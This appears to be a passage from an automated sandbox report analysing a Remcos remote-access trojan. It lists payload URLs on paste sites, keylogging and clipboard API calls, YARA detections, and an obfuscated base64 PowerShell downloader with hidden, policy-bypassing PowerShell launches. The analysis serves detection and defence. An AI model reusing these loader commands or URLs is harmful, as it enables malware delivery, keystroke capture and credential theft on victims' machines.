                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/08
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/jm8qu/0P
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C700000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/r322U/0
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 0000000D.00000002.1948758053.000001AB893C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exeString found in binary or memory: https://www.google.com
                    Source: AddInProcess32.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C4F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203DBEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203C729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 (idHook 0x0D = WH_KEYBOARD_LL, the low-level keyboard hook reported on the next line) | 23_2_0040A2F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard | 23_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 23_2_004168FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 29_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 29_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 29_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 30_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 30_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 30_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 30_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 31_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard | 31_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 31_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard | 31_2_004072B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard | 23_2_0040B749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx | 23_2_0040A41B
Source: Yara match | File source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

                    E-Banking Fraud

Source: Yara match | File source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0041CA6D SystemParametersInfoW | 23_2_0041CA6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 23_2_0041CA73 SystemParametersInfoW | 23_2_0041CA73

                    System Summary

Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
